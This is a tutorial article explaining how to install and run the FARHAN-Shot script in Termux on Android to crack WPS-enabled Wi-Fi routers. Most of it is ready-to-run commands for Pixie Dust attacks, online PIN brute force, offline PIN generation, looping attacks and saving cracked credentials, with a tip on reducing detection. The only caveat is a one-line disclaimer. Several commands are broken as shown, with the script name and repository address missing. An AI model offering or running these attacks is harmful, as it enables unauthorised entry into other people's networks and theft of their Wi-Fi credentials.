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How to Access Wi-Fi Networks on Android Using FARHAN-Shot in Termux

Learn how to use FARHAN-Shot in Termux to test Wi-Fi security on Android. Perform Pixie Dust and WPS attacks with this powerful tool.

Getting into Wi-Fi networks can be important for many reasons, like checking security or connecting when you forget your password. If you have advanced skills and control over your Android device, the Termux app with the FARHAN-Shot script can help you do this.

The FARHAN-Shot script is a useful tool that helps find weaknesses in Wi-Fi networks, especially those that use WPS (Wi-Fi Protected Setup). It can perform different types of attacks, including the Pixie Dust attack, which works well on some routers.

By using the FARHAN-Shot script in Termux, you might be able to access Wi-Fi networks by taking advantage of WPS weaknesses, as long as you have the right permissions and knowledge.

WarningThis guide is intended for educational purposes only. Unauthorized access to networks is illegal and unethical.

How to Access Wi-Fi Networks on Android Using FARHAN-Shot in Termux

Key Features of FARHAN-Shot

FARHAN-Shot is a great tool for testing Wi-Fi security. It works well on Android devices using Termux because it doesn't need to switch to monitor mode. Here are its main features:

  • Pixie Dust Attack (No Monitor Mode Needed)

    The Pixie Dust attack is a fast way to break into WPS-enabled networks by taking advantage of weaknesses in the WPS system. Unlike other methods that need many attempts, Pixie Dust quickly gets the WPS key. Since it doesn't need monitor mode, it's easier to use on Android.

  • Built-in 3WiFi Offline WPS PIN Generator

    FARHAN-Shot has a built-in tool to generate WPS PINs without needing the internet. This tool uses a database of known WPS PINs, making it easier to crack a router's security. This is helpful when:

    • The router uses a weak or default WPS PIN.
    • You want to try PINs without connecting to the router.
    • You have limited internet access.
  • Online WPS Bruteforce Attack

    If the Pixie Dust attack doesn't work, FARHAN-Shot can try different WPS PINs online until it finds the right one. This method is good for:

    • Routers that don’t limit PIN attempts.
    • Testing specific networks.
    • Finding out the default PIN for unknown networks.

    Keep in mind, some routers may lock you out after too many failed attempts, so you may need to wait between tries.

  • Built-in Wi-Fi Scanner

    FARHAN-Shot includes a Wi-Fi scanner that shows real-time information about nearby networks. It helps users:

    • Find Wi-Fi networks, including those with WPS.
    • Highlight networks based on their security status.
    • Get important details like signal strength and encryption type.

    This scanner makes it easier to find target networks without needing extra tools.

Requirements for FARHAN-Shot

Before installing and using FARHAN-Shot, ensure that your device certain requirements.

To run FARHAN-Shot smoothly, your system must have:

  • Python 3.6 or above – Required for executing the script.
  • WPA Supplicant – Essential for managing wireless connections.
  • Pixiewps – A tool specifically designed for performing Pixie Dust attacks.
  • iw – A command-line tool for managing wireless devices and scanning networks.
  • Root Access – FARHAN-Shot requires root privileges to interact with the network interface.

    If your Android device is not rooted, don’t worry—you can still use FARHAN-Shot by installing Kali NetHunter. NetHunter is a mobile penetration testing platform that provides a full Kali Linux environment on Android devices, including tools like Pixiewps and iw. This allows you to run Wi-Fi penetration tests without modifying your device’s system files.

How to Install FARHAN-Shot on Termux

Installing FARHAN-Shot is a straightforward process. You can either use a one-line installation command or manually install the required packages before running the tool.

One-Line Installation (Recommended)

To quickly install FARHAN-Shot and its dependencies, open Termux and run the following command:

apt update && apt upgrade && pkg install tsu && pkg install python && pkg install git && pkg install -y root-repo && pkg install -y git tsu python wpa-supplicant pixiewps iw openssl && git clone --depth 1 FARHAN-Shot && termux-setup-storage && cd FARHAN-Shot

This command will:

  • Update and upgrade Termux to ensure you have the latest packages.
  • Install dependencies, including Python, Git, and necessary networking tools.
  • Clone the FARHAN-Shot repository from GitHub.
  • Set up Termux storage for proper functionality.
  • Navigate to the FARHAN-Shot directory.

Manual Installation (Step-by-Step)

If you prefer to install everything manually, follow these steps:

Step 1: Install Required Packages

Run the following command to install all necessary dependencies:

pkg update && pkg upgrade && pkg install -y root-repo && pkg install -y git tsu python wpa-supplicant pixiewps iw openssl && termux-setup-storage
Step 2: Clone the FARHAN-Shot Repository

After installing the required packages, download the FARHAN-Shot tool:

git clone --depth 1
Step 3: Run FARHAN-Shot

Navigate to the FARHAN-Shot directory and execute the script:

cd FARHAN-Shot && sudo python ‎ -i wlan0 -K

This will launch the Pixie Dust attack using your wireless interface.

Info! The default network interface used in the commands is wlan0. If your device uses a different interface (e.g., wlan1 or eth0), replace wlan0 with the correct interface name. To check your network interface, use the following command in Termux:
iw dev
This will display all available interfaces on your device. Look for the one associated with your WiFi adapter.

How to Update FARHAN-Shot

To keep your tool updated with the latest features and fixes, run:

cd FARHAN-Shot && git pull

This command will pull the latest updates from the official GitHub repository.

With FARHAN-Shot installed and updated, you’re now ready to start Wi-Fi penetration testing.

How to Use FARHAN-Shot for Wi-Fi Penetration Testing

Once you have installed FARHAN-Shot, it's time to use its powerful features for Wi-Fi security testing. This section will guide you through the essential commands and attack methods supported by the tool.

Basic Usage

To run FARHAN-Shot, navigate to the installation directory and execute the script with the required arguments:

cd FARHAN-Shot && sudo python ‎ -i wlan0 -K


  • -i wlan0 specifies the wireless interface used for the attack.
  • -K initiates the Pixie Dust attack, which exploits vulnerabilities in WPS-enabled routers.

Scanning for Available Wi-Fi Networks

Before targeting a specific access point, you may want to scan nearby Wi-Fi networks:

cd FARHAN-Shot && sudo python ‎ -i wlan0

This command will list all detectable Wi-Fi networks along with their BSSID (MAC address), signal strength, and WPS status.

Performing a Pixie Dust Attack

The Pixie Dust attack is one of the most effective techniques for exploiting WPS vulnerabilities. To launch this attack on a specific target, use:

sudo python ‎ -i wlan0 -b <BSSID> -K

Replace <BSSID> with the MAC address of the target router.

Using the Integrated 3WiFi Offline WPS PIN Generator

FARHAN-Shot includes an offline WPS PIN generator using the 3WiFi database. This allows you to predict WPS PINs for certain routers without requiring an active connection.

To generate a PIN for a specific network, use:

sudo python ‎ -i wlan0 --3wifi

This will attempt to retrieve a known WPS PIN for the target access point.

Running an Online WPS Bruteforce Attack

If the Pixie Dust attack fails, you can try an online WPS bruteforce attack, which systematically guesses the WPS PIN:

sudo python ‎ -i wlan0 -b <BSSID> -B

This method can take longer but may be effective on WPS-enabled routers that do not have proper security measures.

Using the Wi-Fi Scanner with iw

FARHAN-Shot features an integrated Wi-Fi scanner that uses iw for better performance. To scan for networks and highlight WPS-enabled access points, run:

sudo python ‎ -i wlan0 --scan

This provides a detailed network list with useful information such as encryption type, signal strength, and WPS status.

Advanced Script Options

FARHAN-Shot offers several advanced options to enhance Wi-Fi penetration testing. These options provide more control over attack methods, network scanning, and performance tuning.

Specifying a Custom WPS PIN

If you have a known or suspected WPS PIN for a network, you can manually specify it:

sudo python ‎ -i wlan0 -b <BSSID> -p <WPS_PIN>

Replace <WPS_PIN> with the actual 8-digit PIN.

Setting a Delay Between PIN Attempts

To reduce the chances of detection or lockout, you can introduce a delay between WPS PIN attempts:

sudo python ‎ -i wlan0 -b <BSSID> -B -d 5

This command sets a 5-second delay between each PIN attempt.

Saving Cracked Credentials

To save successful Wi-Fi credentials for future use, use the -w option:

sudo python ‎ -i wlan0 -b <BSSID> -K -w

The credentials will be stored in a file for later reference.

Forcing Pixiewps Bruteforce

If a router does not yield to the standard Pixie Dust attack, you can try forcing Pixiewps to run a full brute-force attack:

sudo python ‎ -i wlan0 -b <BSSID> -K -F

Use this option only when necessary, as it may take longer to complete.

Viewing the Exact Pixiewps Command

To see the exact command used by Pixiewps, use:

sudo python ‎ -i wlan0 -b <BSSID> -K -X

This is useful for debugging and understanding how the attack is executed.

Using a Custom Vulnerability List

If you have a list of known vulnerable devices, you can specify it with:

sudo python ‎ --vuln-list=my_vulnerable_routers.txt

This helps focus attacks on routers that are more likely to be compromised.

Automatically Disabling the Network Interface After Completion

To ensure the wireless interface resets properly after an attack, use:

sudo python ‎ -i wlan0 --iface-down

Running the Script in a Loop

For continuous testing or automation, the script can be run in a loop:

sudo python ‎ -i wlan0 -K -l

This makes the attack repeat until manually stopped.

Reversing the Scan Order

To scan networks in reverse order, use:

sudo python ‎ -i wlan0 --reverse-scan

Activating MediaTek Wi-Fi Interface Driver

For devices with MediaTek chipsets, enabling the correct Wi-Fi driver can prevent interface issues:

sudo python ‎ -i wlan0 --mtk-wifi

Enabling Verbose Mode

To get detailed output during the execution, use:

sudo python ‎ -i wlan0 -v

This provides a real-time log of the attack process.

These advanced options make FARHAN-Shot a highly flexible and powerful tool for Wi-Fi penetration testing. Below is a summary:

Option Description
-h, --help Show this help message and exit
-i INTERFACE, --interface INTERFACE Name of the interface to use
-b BSSID, --bssid BSSID BSSID of the target AP
-p PIN, --pin PIN Use the specified pin (arbitrary string or 4/8 digit pin)
-K, --pixie-dust Run Pixie Dust attack
-F, --pixie-force Run Pixiewps with --force option (bruteforce full range)
-X, --show-pixie-cmd Always print Pixiewps command
-B, --bruteforce Run online bruteforce attack
-d DELAY, --delay DELAY Set the delay between pin attempts
-w, --write Write credentials to the file on success
--iface-down Down network interface when the work is finished
--vuln-list VULN_LIST Use custom file with vulnerable devices list
-l, --loop Run in a loop
-r, --reverse-scan Reverse order of networks in the list of networks. Useful on small displays
-v, --verbose Verbose output

Troubleshooting Common Issues

Even with proper setup and execution, you might encounter some issues while using FARHAN-Shot. Below are common errors and their solutions to help you resolve problems quickly.

Fixing "RTNETLINK Answers: Operation Not Possible Due to RF-Kill"
Error! RTNETLINK answers: Operation not possible due to RF-kill


If you see the error message above, it means the Wi-Fi interface has been soft-blocked, usually by a software switch.


Unblock the Wi-Fi interface using the following command:

sudo rfkill unblock wifi

This command will remove the soft block, allowing you to proceed with penetration testing.

Dealing with "Device or Resource Busy (-16)" Error
Error! Device or Resource Busy (-16)


This error occurs when the Wi-Fi interface is still being used by another process, such as Network Manager.


  • First, disable Wi-Fi in your system settings.
  • Then, terminate any conflicting processes.
  • If the problem persists, try running the script with the interface down option:
sudo python FARHAN-Shot/ --iface-down
Handling Disappearing wlan0 Interface on MediaTek Devices
Error! wlan0 Interface Disappeared


On certain Android devices with MediaTek SoCs, disabling Wi-Fi might cause the wlan0 interface to disappear completely.


To prevent this from happening, use the MediaTek Wi-Fi interface driver activation command:

sudo python FARHAN-Shot/ --mtk-wifi

This ensures the wlan0 interface remains active during testing.

These troubleshooting tips should help resolve the most common issues users face when using FARHAN-Shot.

Usage Examples

Starting a Pixie Dust Attack

A Pixie Dust attack exploits vulnerabilities in the WPS (Wi-Fi Protected Setup) protocol to retrieve the WPS PIN and ultimately crack the Wi-Fi password.

Run the following command to initiate a Pixie Dust attack on a specific BSSID:

cd FARHAN-Shot && sudo python3 ‎ -i wlan0 -b 00:90:4C:C1:AC:21 -K

Replace 00:90:4C:C1:AC:21 with the actual BSSID of the target network.

Showing Available Networks and Starting a Pixie Dust Attack

If you want to scan for WPS-enabled networks before launching an attack, use this command:

cd FARHAN-Shot && sudo python3 ‎ -i wlan0 -K

This will display a list of available networks and initiate the Pixie Dust attack on detected vulnerable targets.

Launching an Online WPS Bruteforce Attack

If you know part of the WPS PIN, you can use an online bruteforce attack to guess the remaining digits and gain access:

cd FARHAN-Shot && sudo python3 ‎ -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234

Replace 00:90:4C:C1:AC:21 with the BSSID of the target network and 1234 with the known portion of the WPS PIN.

That's it, if you find a problem while using FARHAN-Shot, Please leave a comment below explaining what happened, and we will help you fix it! Your feedback also helps make the guide better for others.

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